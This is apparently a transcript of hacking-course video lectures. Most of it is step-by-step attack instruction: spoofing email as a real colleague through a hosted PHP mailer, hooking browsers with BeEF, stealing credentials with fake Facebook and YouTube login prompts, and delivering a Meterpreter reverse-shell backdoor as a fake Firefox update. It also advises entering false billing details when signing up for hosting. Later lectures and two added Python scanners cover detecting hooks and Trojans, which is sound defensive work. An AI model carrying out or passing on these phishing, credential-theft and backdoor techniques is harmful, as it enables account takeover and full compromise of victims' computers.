11. Email Spoofing – Method 2
In the previous lecture, we saw how to use an SMTP server to spoof emails and make them appear as if they were sent from any other email address we want. I also mentioned in the previous lecture that there is another way of doing this, and that is by using a web host. Web hosting is simply a service that allows us to host files on the internet. Therefore, we can use it to host our own website, we can use it to share files, or we can even use the server resources to send emails, as I’m going to show you in this lecture. So as you can see, learning how to set up and use a web host can be useful in many scenarios, and you can actually use it to do much more than what I’m going to show you here. You can find a plethora of free web hosting providers by searching Google. Unfortunately, none of them allow you to send emails. That’s not really a big problem, because even paid web hosting plans are very, very cheap. You can look online for the cheapest, and you can use any provider you want, because the steps that I’m going to show you will work with any provider. But right here, I have a web hosting provider called DreamHost. They are pretty cheap, and they work well.
So if we click on “Get Started” in here, you’ll see the cheapest plan is $2.95 per month. So we’re going to click on sign up, and I’m going to set this to monthly, and you’ll notice the price will actually increase slightly. So now it’s $5 per month instead of $2.95 if you paid for a year, but that’s fine. And I’m going to say, “Choose a domain later.” You really only need a domain if you’re hosting your own website. The domain is what you see here on top when it says, for example, dreamhost.com or zsecurity.com. But in our case, we don’t need that. So we’re just going to say, “Choose a domain later,” and we’re going to select our payment method. I’m going to pay with PayPal. Next, you have to enter the billing address. Now, you don’t have to put the correct information in here. You can write whatever you want.
So I’m just going to fill this out randomly. Next, we have the account setup. Make sure you put a valid email address in here, because they will send you a confirmation. So I’m going to use my own email and put a first name, last name, and phone number. Again, it doesn’t have to be real. We’re going to uncheck this to not receive marketing. We don’t want WordPress installed, so we’re unchecking this. We don’t want protection, so we’re unchecking this, and we don’t want the email service that they provide, so we’re unchecking this too, because we’re actually going to rely on PHP to send the email using the mail() function in PHP. So we’re basically unchecking everything. We’re going for the most basic plan they have, and we’re just going to click on submit order. Now, the sign-up might be slightly different if you’re using a different provider, but the steps are very simple and it’s more or less the same. It’s asking us to set a password now, and we’re going to continue to our control panel and complete it.
Now we have a web hosting plan that we can use to host our own websites and files, if you want to deliver backdoors and such to your targets, or you can use it to send fake emails, as I’m going to show you. Now, again, this dashboard might be slightly different depending on the provider that you have, but you’ll notice that the steps are pretty much the same. You want to first access the management page for the website. So you can see in here that it’s given us this button called “manage my websites.” We can see this is our website right now, but it’s saying it’s unavailable because it’s still being set up.
So we’ll give it time to set up, and we’ll resume the video once it’s finished. Okay, so now that the website is ready and we can see a preview of it here, we can simply click on it to actually access it. As you can see, this is the URL for our website, and it’s a simple default website with nothing on it; it just tells you to go to the admin panel to add content to the website. So, back on the management page, we’re going to click on “manage,” and depending on which provider you have, you want to look for the file manager. As you can see, it says “manage files” in my case. And if we click on the manage icon here, we get our file manager. From here, you want to navigate to a directory called public_html, or a directory that has the name of your website, as we have here. This is actually the name that I signed up with. It’s gibberish, but that’s what I set it to. So we’re just going to click on it.
This is the directory where you should upload your files. So, if you’re hosting a website, upload the website files here, and if you’re sharing files, upload them here as well. Or, in our case, we want to send fake emails, so we’re going to upload the PHP file that we’re going to use to send the emails to this location. Now, the file is in the resources of this lecture, so download it. I have it already downloaded in here, and as you can see from the file name, you’re going to have to rename this file to send.php, because I can’t upload PHP files to the lecture resources; that’s why I uploaded it in .txt format. So we’re going to go up again, and you’re going to need to find the upload button. In my case, it’s here. I’m going to click on it and select the file that I want to upload, which is in my downloads, and it’s this file right here. I’m going to double-click it, and we have the file right here: send.php. So all we need to do now is go to the website, which I’ve opened in a new tab, add a forward slash after the website name, and type the file name, send.php. Using this is very simple.
Next, we’re going to set the “from” email. This is the email address that this email will appear to be coming from. So again, just to change things around, we’re going to set the email this time to adrian@zsecurity.org. Now again, when you’re setting the from email, make sure that you set it to an email address that actually exists, and make sure that your target actually receives emails from this address and communicates with it. This will ensure that the email lands in the inbox, and it will also increase the chances of your target opening the email and interacting with it. Adrian works with me at the same company. We frequently exchange emails, so this is a really good email to spoof. The next field is the name field. This is similar to the header that we set manually in the previous lecture. So let me go to my inbox to show you where this name shows up. Right here I have an actual email that I got from Adrian, and this part right here is the name. So whatever you set in here will be displayed in that part. If you don’t set it, it will automatically be set to the email address, and it will appear like this one, which is not identical to the real one that I get from him. So we’re going to set this to Adrian’s name.
We’re going to set the subject, and let’s just set the subject of this to “test,” and we’re just going to set the body to “this is another email spoofing test.” Now, I don’t really need to send a backdoor in this. The whole point of this lecture is to show you another method of spoofing emails. So now that we’re done with everything, I’m going to click on submit to send the email, and as you can see, it’s saying “email sent.” That means the email was sent and received. So let’s go to the inbox, let’s see if it looks identical to the real one, and let’s see if it actually gets delivered into our inbox. So right here I have my inbox, and as you can see here, the bottom one is an actual email that I got from Adrian. This is a real email from Adrian. The name can be seen here, which is the same as the name here. If I hover over the real email, as you can see, I get a card that shows his name, his email, and his phone number.
And if I hover over the spoofed one, again I get the exact same card, because it’s pulling this from my contacts. So it’s automatically populating this. If I go to the real email, right here, again you can see this is a real email from him. You see the name, you see the profile picture, and you see that it’s from Adrian Budd. Let’s go back to the spoofed one. You have the picture, you have the name, and if you look in here, you have the correct email, [email protected]. The only part that might look a little bit suspicious is the fact that it shows the “via” label in here, but a lot of people are not going to pay attention to this. And this is only displayed in Gmail. So we tested it live, and this doesn’t even show up there.
And even with Gmail, we have the correct profile picture, the correct name, the correct email address if you look in here, and even the correct phone number. So this is just another method to show you how to spoof emails, in case the previous method didn’t work or you just didn’t like it; you can try this one instead. Like I said, you can use any web hosting provider. You do not have to use the one that I used. You can try the free ones or the paid ones, and like I said, you will get better results with the paid ones. The steps are pretty much the same. The only difference might be the sign-up process and the process of uploading the file to the website. But the idea is the same: you sign up with a web hosting provider, you upload this PHP file, you browse to the file from your web browser, and you use it to send the email.
12. BeEF Overview & Basic Hook Method
In this lecture, I’d like to introduce you to a really cool framework called BeEF. “BeEF” is short for the Browser Exploitation Framework. It allows us to run a number of attacks on hooked browsers that can let us further exploit the target system, steal passwords, or even gain full access to or full control over the system. So right here, I’m at my Kali machine, and we can go ahead and start BeEF. To do that, I’m going to click on all my applications, type “beef,” and click on the first icon in here, “beef start.” You can use “beef stop” to stop it, but right now we just want to start the framework. So we’re going to click on “start now.” Because this is the first time we run the framework, it’s asking us to set a password for the default user.
So go ahead and pick any password you want. And note that when you type the password, you will not see the characters on screen. This is a security feature so that people around you will not see your password. So right now I’ve actually typed my password, but you can’t see anything on the screen. I’m just going to hit enter, and then it will automatically start the Beef framework for me, and it will automatically start Firefox and go to the web interface that we can use to access Beef and control the hooked browsers. As you can see, the first thing that it’ll ask us for is a username and password to log in to this web interface. The default user is beef. And the password is the one that we just set in Terminal.
I’m going to hit Enter to log in, and as you can see, we have the main user interface of BeEF. The main thing you can see here on the left are the online and offline browsers. Under online browsers, you can control the browsers that are currently connected to BeEF, and under offline browsers, you’ll see the browsers that you were previously able to control, that is, browsers that were previously hooked to BeEF. Now, in order to hook a browser to BeEF and be able to control it and run commands on it, you have to get that browser to execute a specific piece of JavaScript code. So if we go back to the terminal window that started BeEF for us and just scroll up, you’ll see that it’s given us the JavaScript code that we need to use to hook browsers to BeEF.
As soon as this piece of code gets executed in a web browser, you will see that web browser here in the online browsers, and you’ll be able to execute a lot of really cool commands that will allow you to show fake login pages, show fake updates, and even gain full control over the target system. Now, because BeEF uses JavaScript, it’ll work on any web browser that supports JavaScript, regardless of what device this web browser is running on. So it’ll basically work on all modern browsers: it will work against phones, tablets, smart TVs, and all operating systems used on PCs such as Linux, Windows, OS X, and so on. Literally any browser that can run JavaScript will be able to run this code, and therefore you will be able to hook that browser to BeEF and do all of the cool things that you will learn in the next lectures. So right now, it really depends on you and your imagination how you’re going to get this piece of code to run in a web browser. If you’re able to become the man in the middle, you can do DNS spoofing and redirect requests to a page that contains this hook code, or you can inject this JavaScript into any web page that the target loads, using the JavaScript injection methods that we learned once you become the man in the middle. You can also exploit an XSS vulnerability and inject this code into a vulnerable web page, and you will learn how to do that in the website hacking section.
Or you can use social engineering to get a target to load a web page that contains our hook code. So all you’ll need to do is think of a way to get a target to load a page that contains the JavaScript code. Now, in this lecture, I’m going to show you a very basic hook method that is really good for making sure that our system is working as expected. And because we’re going to have an HTML page with the hook code, this page can also be used with methods one and four. Therefore, you can either DNS spoof targets to this page or social engineer them to this page. And once they load this page, the hook code will be executed in their browser, and therefore they will be hooked to BeEF, and we’ll be able to run all of the commands that BeEF allows us to run. So let’s go back to BeEF. And like I said, this is the code that we want our target browsers to load or execute. So I’m going to copy it, and I’m going to go and open my file manager, and I want to go to my web root.
So, you can either press Ctrl+L on your keyboard or click here in the path bar and simply press the forward slash. This will open a path text box where you can type the path that you want to go to, and I want to go to /var/www/html. Now, as we learned before, this is the location where the files for your web server are stored, and index.html is the file that gets loaded by default when someone loads your IP in their web browser. So I’m going to right-click index.html, choose to open it with a text editor, remove all of this, and paste the hook code in here. There is one thing that I want to modify, and that is the IP in here. I’m going to replace this IP with the IP of my Kali machine. As we learned before, you can get the IP using the ifconfig command, so I’m not going to do it right now; you should already know this by now. I know my IP is 10.20.14.207, and that’s it.
We’re ready to go. So if anybody now loads my IP address, which is 10.20.14.207, I have a web server running on it that will load index.html by default. When this file is loaded, it will load the BeEF hook code, and it’ll hook that browser to BeEF, which will allow me to run a number of really cool commands. Now, before loading this page, we need to start our web server, and as previously stated, we can do this by launching Apache. Now my Apache web server is running, and if I go to my Windows machine in here and simply go to the address of my web server, which is 10.20.14.207, as you can see, we get a blank page. That’s fine, because our page contains nothing but the code. You could actually have a proper HTML page and just put the hook code at the end or at the beginning, but this will do for testing for now. And if we go back here to the BeEF interface and look at the online browsers, you’ll see we have the IP address of my target, which is 10.20.14.206. This is the IP address of the Windows machine.
Now, if I click on it, you’ll see I have a number of tabs in here that allow us to do various things. In the Details tab, you’ll see information about the browser of the target. For example, you can see that it doesn’t have a VLC plugin installed, and that it supports WebSocket. If you scroll down, you can see the user agent, which is Mozilla/5.0, and that it’s running on Windows NT, 64-bit. If you keep going down, you can see the cookies, the host name, the screen size, and a lot of other information that can be useful when it comes to exploiting a target. In the Logs tab, you’ll see logs of all the events that happened in the browser, and if you execute commands, you’ll see logs in here for these commands. The Commands tab is the one that we’re going to be using the most in the next lectures. This will allow you to run various commands on the target. Like I said, you can run information-gathering commands, run commands to inject other JavaScript code, run commands to steal passwords using fake logins, and run fake updates to get your target to download the backdoor and hack their computer. There are a lot of really cool things that you can do, and I will walk you through some of the best ones in the next lectures.
In the Proxy tab, you can configure and use a hooked browser as a proxy. The XssRays tab will show you if the hooked page contains any XSS vulnerabilities. And the Network tab will give you an overview of the current network. So right now you can see we have the target running Windows, and we have its browser, which is hooked to BeEF, and then us. From here we’ll be able to, like I said, launch a number of really cool commands that can be used to do so many things and further exploit the target system. Once you’re done using BeEF, you can click on Logout to log out, then go to All Applications, look for BeEF, and click on “beef stop” to stop the service from running in the background. So that’s it for this lecture. I just wanted to give you a quick overview of BeEF. In the next lectures, we’ll see how we can use it to steal credentials, get screenshots, gather information, and even gain full control over hooked browsers.
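The hook code pasted into index.html above is a single script tag that loads hook.js from the attacker’s machine (BeEF listens on port 3000 by default), so from the defender’s side the thing to look for in served or proxied HTML is a script loaded from a host that is not one of your own. The following Python scanner is an added example, not code from the lecture or from the BeEF project; the allowlist, both sample pages and the address 192.0.2.10 are constructed.

```python
"""Added example (not from the lecture or BeEF): find <script src=...> tags
that load JavaScript from hosts outside an allowlist, the pattern a BeEF hook
page relies on. The allowlist and the sample pages are constructed."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed allowlist: the only hosts this site is expected to load scripts from.
ALLOWED_SCRIPT_HOSTS = {"www.example.org", "cdn.example.org"}

# Constructed page shaped like the lecture's hook page (placeholder address).
HOOK_PAGE = """<html><head>
<script src="http://192.0.2.10:3000/hook.js"></script>
</head><body></body></html>"""

# Constructed page that only loads same-origin and allowlisted scripts.
CLEAN_PAGE = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example.org/lib.js"></script>
</head><body><p>hello</p></body></html>"""


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a document."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            for name, value in attrs:
                if name == "src" and value:
                    self.sources.append(value)


def external_script_sources(html: str) -> list:
    """Return (src, host, port) for every script loaded from an absolute URL;
    same-origin paths such as /static/app.js have no network location and are skipped."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    found = []
    for src in collector.sources:
        parts = urlsplit(src)
        if parts.netloc:
            found.append((src, parts.hostname, parts.port))
    return found


def suspicious_scripts(html: str, allowed=ALLOWED_SCRIPT_HOSTS) -> list:
    """Scripts whose host is not allowlisted, each with the reasons it stands out.
    A raw IP host, a non-standard port or a path ending in hook.js each add a reason."""
    hits = []
    for src, host, port in external_script_sources(html):
        if host in allowed:
            continue
        reasons = ["host not on allowlist"]
        if host and host.replace(".", "").isdigit():
            reasons.append("raw IP address")
        if port not in (None, 80, 443):
            reasons.append(f"non-standard port {port}")
        if urlsplit(src).path.endswith("hook.js"):
            reasons.append("path ends in hook.js")
        hits.append({"src": src, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for label, page in (("hook page", HOOK_PAGE), ("clean page", CLEAN_PAGE)):
        print(label, suspicious_scripts(page) or "no suspicious scripts")
```

Running this over pages as a web server serves them, or over HTML responses captured by a forward proxy, surfaces the injected script whichever delivery route from the lecture was used (a modified index.html, DNS spoofing to a look-alike page, or injection into a legitimate page). The same allowlist expressed as a Content-Security-Policy `script-src` directive stops the browser from loading the hook at all, which is the corresponding preventive control.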
13. BeEF – Hooking Targets Using Bettercap
14. BeEF – Running Basic Commands On Target
So now that we have our target browser hooked, we can go to the Commands tab and start executing commands on that target. You can use the search box to filter if you’re looking for a certain command and already know what you want, or you can use the categories to look for commands suitable for what you want to do on the target computer. Some of these commands are information gathering commands, some are social engineering commands, and some will even give you full control over the target computer. There are a lot of commands, so I won’t be able to go over all of them, but I’ll be showing you some of the most important ones, as well as examples of simple ones, so you know how to experiment with and run the other commands.
So, starting from the top, if you go into Browser, you’ll see commands related to things you can do inside the browser. For example, you’ll see things that allow you to get a screenshot, check whether the webcam works and then turn on the webcam on the target, and gather information. If you go to Exploits, you’ll see a number of exploits that you can run, depending on what’s running on the target computer. All you have to do is select the module you want to run and press the Execute button. Some modules need options to be set up first, and we’ll have examples of that as well. In Social Engineering, again, there is some really cool stuff that you can do: you can show fake updates, fake notification bars, and things like that. So let’s have an example of a very simple command. We’re going to do just an alert, to show an alert box. I’m using the search to filter, and you can see that this will create an alert dialogue with the word “BeEF” in it. You can modify this and type in anything you want.
For example, I’m going to type in “Test,” hit Execute, and go to the target, and you’ll see that the target got a message saying “Test.” So this has been injected into the target browser. Another cool thing that you can do is use Raw JavaScript, which allows you to execute any JavaScript you want. So, once again, you can search Google for useful JavaScript code, such as a keylogger or whatever you want to do, or you can write your own if you know JavaScript. Basically, whatever you write here will be executed on the target. Again, we’re only doing an alert, and this one is going to say “raw JavaScript.” I’m going to execute it, and here we go again: we got a message that said “BeEF raw JavaScript.” Let’s see if we can get a screenshot of the target computer. We’re going to use a module called Spyder Eye. Click on it and hit Execute, give it a second, and then click on the command here. It looks like this time things didn’t work properly, so let’s just do it again.
And here we go. As you can see, we’ve got a screenshot of what the target person is looking at. Another really good plugin is the Redirect plugin, which will basically allow you to redirect the browser to any web page you want. This could be very useful because you can use it to redirect the target person to a page telling them that they need to download an update, and instead of giving them an update, give them a backdoor. You can redirect them to a fake login page, for example for Facebook; you can do whatever you want. So you set the website that you want the target to be redirected to, and we’re going to redirect them to the BeEF project website in this example. Once you hit Execute, as you can see here, they’re redirected to the BeEF project website. These are some of the basic modules that you can use. Again, you can experiment with these, go over them, and see what would be useful in your particular situation.
15. BeEF – Stealing Passwords Using A Fake Login Prompt
Okay, now let’s have a look at a social engineering plugin that allows us to steal usernames and passwords for accounts. Basically, this works by dimming the screen and informing the user that they have been logged out of their session, so they need to log in to their account again to get authenticated. This allows us to bypass HTTPS, HSTS, and all of the security that’s used by the target account page.
For example, if you’re trying to get the username and password for Facebook, you’ll be able to bypass all the security that Facebook uses, because what you’re doing is actually just showing a fake Facebook page, so the user never actually gets in contact with Facebook. So let’s just click on this, and you’ll see that you can select from here the account that you want to hijack. Let’s say we’re going with Facebook, and you can select what the background colour will be; we’re just leaving that at grey. We’re going to execute this, and when we go to our target, you’ll notice that they’re told they’ve been logged out of their session, so please log in with your username and password. I’m going to enter “Zed” as my username and “123456” as my password and hit Enter.
And if we go back here, you’ll see that we got our username as “zed” and our password as “123456”. So you can use this to hijack a number of accounts. Let’s just have another example. If we go with YouTube again, you give it an execute and come back, you see the YouTube logo, and you can try to log in, put your username and password, and that will be captured. So again, this is a really good way of gaining access to accounts because even if the user is not planning on logging into the account you’re trying to steal, you’ll kind of force them to enter their username and password to get logged back in to their account. Then you’ll be able to get the username and password.
16. BeEF – Hacking Windows 10 Using a Fake Update Prompt
Okay, so let’s see how we can gain full control and get a Meterpreter session from the target computer. So, once again, we’ll start with commands and then move on to social engineering. There are several methods available in this section for obtaining a reverse shell. Everything now depends on how you want to carry out your social engineering attack. What we’re going to use is a fake notification bar, and we’re choosing Firefox because our target runs Firefox. So what this will do is basically display a notification bar telling the user that there is a new update or a plugin that they need to install. Once they install the plugin, they’ll actually install a backdoor, and you’ll have full access to their computer. So we’re going to use the same backdoor that we’ve always created and used to accomplish this. Now I actually have it stored in my web server, so I have it stored in /var/www/html, and I have it called update.exe, but it’s the same backdoor, the same reverse HTTP Meterpreter that we used before.
So I’m going to give you the full address here. It’s saved at 10.20.14.207, which is my actual IP, and the name of the file is update.exe. And then the notification. The notification is just saying there is an additional plugin that needs to be installed to display some elements on this page. Now you can change this and just say “critical update” for Firefox, click here to install. So I’m going to hit execute. And if we go on to the target, you can see that they’re getting a message telling them that there’s a new update for Firefox and to click here to download and install. So the target person will be like, “Oh yeah, I need to install this.” So they download it, and now they basically have a backdoor downloaded on their machine. Once they try to run this backdoor to install the update, they think it’s an update, but they’ll actually run a backdoor, which will give us full access to their computer.
Before I open the backdoor, I need to listen on the port the same way we did before. So I’m just going to show you the options here; I’m not going to go through all the steps. It’s using Metasploit’s multi/handler, the same way we did it in the video on listening for connections. So we’re using the reverse HTTP Meterpreter payload. I have my IP and the port, so I’m just going to run exploit, and I’m listening for connections now. Now, let’s run the update that we just downloaded, and you can see that we have full control over the target thanks to a Meterpreter session. Now, again, this is just an example of one way of gaining full control over the target computer. There are a number of ways that you can do this using phishing, and there are a number of social engineering attacks that you can conduct to gain full access to the target computer. So again, I highly recommend you go over the plugins and experiment with them to see what attacks you can come up with.
17. Detecting Trojans Manually
So the Trojans that we have created so far are very cool. They can bypass antivirus programs. They run two pieces of code. The first one runs in the background and runs our own code, which does what we want it to do. For example, open a port or connect back to us and give us a shell.
And it runs another piece of code that the user expects. So it could display an image, play an MP3, or display a PDF file. This functionality makes it very difficult to detect. So the best thing to do is check the properties of the file and make sure that it is what it’s claiming to be. So we have our GTR picture here, and we can see that it’s a JPEG. So it looks like a picture and has an icon. And if I run it, I’ll get a picture like we’ve seen in previous videos. But first, right-click and select Properties. And when we go to the properties, you’ll see that this is an application, not a picture. The same holds true for PDF and MP3. If it was an MP3, it should say MP3, PDF if it was a PDF, and JPG if it was a JPG. However, in this case, we can see that it is telling us that it is an executable.
Going by the details, you’ll see that it is an application. So it’s not a picture. If it was a picture, it should tell you that it’s a picture. So from here, we’ll know that we’re being fooled by this. Another thing you can do is play with the file name: if you just rename the file to anything else, you’ll see that it’s an exe file and not a JPEG. So if I do that and change it to “test,” you’ll see that the name has been changed to “test” and the extension is exe. Now let’s assume this Trojan was combined with an executable. So if you run it, you were expecting to get an exe, and you were expecting an application. So let’s assume that it’s combined with Download Accelerator Plus instead of being combined with a picture, so the task is going to be more difficult because you are expecting an application anyway.
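The Properties check above can be automated. This is an added example, not the lecture’s code: it reads only the first bytes of a file and compares them with the extension in the name, which also catches double extensions such as “gtr.jpg.exe” that Windows shows as “gtr.jpg” when known extensions are hidden. The file names and header bytes used in it are constructed samples.

```python
"""Added example (not from the lecture): compare a file's magic bytes with
what its name claims, the same check the Properties dialog gives you."""
import os

# Leading bytes for the file types discussed in the lecture.
SIGNATURES = {
    "jpg": (b"\xff\xd8\xff",),
    "pdf": (b"%PDF-",),
    "mp3": (b"ID3", b"\xff\xfb", b"\xff\xf3", b"\xff\xf2"),
    "exe": (b"MZ",),  # Windows PE/DOS header, shared by .exe/.scr/.dll
}
ALIASES = {"jpeg": "jpg"}
# Extensions Windows will execute when double-clicked.
RUNNABLE = {"exe", "scr", "com", "pif", "bat", "cmd"}


def sniff_type(head):
    """Type implied by the leading bytes, or 'unknown'."""
    for kind, magics in SIGNATURES.items():
        if any(head.startswith(m) for m in magics):
            return kind
    return "unknown"


def check_bytes(name, head):
    """Judge a file from its name and first bytes; never executes it."""
    exts = [e.lower() for e in os.path.basename(name).split(".")[1:]]
    shown = ALIASES.get(exts[0], exts[0]) if exts else ""
    actual = sniff_type(head)
    reasons = []
    if actual == "exe" and shown not in RUNNABLE:
        reasons.append("content is a Windows executable but name claims .%s" % shown)
    elif actual != "unknown" and shown in SIGNATURES and actual != shown:
        reasons.append("content is %s but name claims .%s" % (actual, shown))
    if len(exts) > 1 and exts[-1] in RUNNABLE:
        reasons.append("double extension ending in .%s" % exts[-1])
    return {"claimed": shown, "actual": actual,
            "suspicious": bool(reasons), "reasons": reasons}


def check_file(path):
    """Read only the header of a real file and judge it."""
    with open(path, "rb") as fh:
        return check_bytes(path, fh.read(16))


if __name__ == "__main__":
    # Constructed samples: a PE header behind a picture name, and a real PDF header.
    print(check_bytes("gtr.jpg", b"MZ\x90\x00" + b"\x00" * 12))
    print(check_bytes("report.pdf", b"%PDF-1.7\n"))
```

As the lecture notes, a Trojan bundled with a genuine installer (an exe that really is an exe) passes this check, which is why the network check that follows is still needed.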
So let’s try to run this. Now, obviously, with the picture and with the PDF, Windows will tell you that you’re trying to run an executable, but if you’re expecting an executable, then you’re going to run it anyway, as is the case with DAP. And this will obviously run the executable that you’re looking for and send a reverse session to Kali. So what I’m going to do is go to a tool called Resource Manager. And if you navigate to the network tab (I’m already there), you’ll be able to see all of your machine’s open ports. And we can see here that we have port 80 connected to an IP address of 10.20.14.203. Now, obviously, 80 is not very suspicious. So even though it’s on 80, it doesn’t look suspicious. And also, it’s coming from a process called “browser,” which again is not very suspicious. The suspicious part is the remote address.
So it’s accessing the address 10.20.14.203, and we have no idea what it is. If it was a website, then putting this in the browser should take you to that website or to a server of that website. In most cases, if this was a hacker’s computer, it would not take you to a website or anything else. And then you’ll know that this person is an attacker. To verify this, you can use tools called reverse DNS lookup: you give it an IP address, and it should tell you what website or domain that IP address belongs to. So let’s have an example with Facebook. So let’s say in your resource manager you see an IP and you’re suspicious about it. So I’m actually going to get you a proper IP address for Facebook. Assume, for example, that you see a connection on port 80 going to this IP. So if you copy this and go to Google and search for reverse DNS, I’ll put the IP address in here, the one you see in your resources, and you look it up. If it’s for a proper website, then there is nothing to be concerned about. If it looks suspicious, then you’ll know that it’s going to a suspicious person. Now, if you see something like this and it’s going to Facebook while you’re browsing Facebook, then this is normal. You’re using Facebook. So there’s a connection between you and Facebook.
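The manual check above (read the connection list, then reverse-DNS the remote addresses) can be scripted. This is an added example, not from the lecture: the connection table is a constructed sample in the layout of Windows `netstat -ano` output using lab and documentation addresses, and the resolver is injectable so the check can run offline against a fixed mapping.

```python
"""Added example (not from the lecture): triage the connection list you
would read off Resource Monitor or `netstat -ano`, flagging remote
addresses that have no reverse DNS name, as the lecture does by hand."""
import ipaddress
import socket

# Constructed sample in the layout of Windows `netstat -ano` output; the
# addresses are lab/documentation ranges, not a real capture.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    10.20.14.10:49712      10.20.14.203:80        ESTABLISHED     4120
  TCP    10.20.14.10:49720      203.0.113.20:443       ESTABLISHED     2280
  TCP    127.0.0.1:5354         127.0.0.1:49702        ESTABLISHED     1832
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       904
"""


def parse_netstat(text):
    """Return established TCP connections as dicts of remote_ip, remote_port, pid."""
    conns = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] == "TCP" and parts[3] == "ESTABLISHED":
            host, port = parts[2].rsplit(":", 1)
            conns.append({"remote_ip": host, "remote_port": int(port), "pid": parts[4]})
    return conns


def reverse_lookup(ip):
    """PTR name for an address, or None when there is no record."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except OSError:  # socket.herror and gaierror are OSError subclasses
        return None


def triage(text, resolver=reverse_lookup):
    """Annotate each non-loopback connection with its PTR name and a verdict."""
    findings = []
    for conn in parse_netstat(text):
        addr = ipaddress.ip_address(conn["remote_ip"])
        if addr.is_loopback:
            continue  # local inter-process traffic, not a remote peer
        conn["ptr"] = resolver(conn["remote_ip"])
        conn["private"] = addr.is_private
        # A common port and a harmless-looking process prove nothing; the
        # remote address with no name behind it is what deserves a look.
        conn["suspicious"] = conn["ptr"] is None
        findings.append(conn)
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_NETSTAT):  # uses the real resolver
        print(f)
```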
18. Detecting Trojans Using a Sandbox
Another way to discover malicious files is to use a sandbox. A sandbox is basically a place where your file will be executed and analyzed. They will check if any ports will be opened, if it’s going to modify registry entries, or if it’s going to do any suspicious stuff. So it’s not an antivirus program. The Trojan may be able to bypass antivirus software, as ours did, with no antivirus program detecting it. However, sandbox applications or sandbox environments will run it in a controlled environment to see if it does anything suspicious and provide you with a report that you can go through. Sandboxing can also be done online, and an example of this is a website called Hybrid Analysis. Using the website is very simple. All you have to do is just go to the URL, select your file, and upload it.
Now, I’ve already done this, so I’m just going to show you the report because analysing the file and producing the report might take some time. So once you get the report, you’ll see some basic information. You’ll see that malicious indicators have been found. Now it’s hiding them from you, and you have to use the full version and pay for it to see them. But you don’t really need to see them. If you read the whole report, you’ll be able to know that this file is malicious and that it’s going to do something bad on your computer. First of all, you can see that the file suppresses error boxes, so it doesn’t display error boxes. It also modifies the registry, and you can see the registry parameters that it’s modifying. You can see that it’s playing with the Internet settings and the connections. You can also see that it’s using the Windows socket service.
So it’s trying to create connections. You can also see that it’s playing with the address space of the process. Scrolling down, you’ll see one of the most important indicators. Now, obviously, there is more information here, right here in the network section: you’ll see that it tries to connect to this IP on port 8080. You can now do a reverse DNS lookup on this IP and see that it is not associated with any website. Also, when you upload the payload to this place, it’s never going to be executed on your computer. It’s going to be executed on their server in a sandbox environment. Now, obviously, the method I demonstrated on the Windows machine should always be performed in a virtual machine, never on your main machine. Or you can use this method, where you upload it to a sandbox environment and it will be analysed for you. And then you can read the report.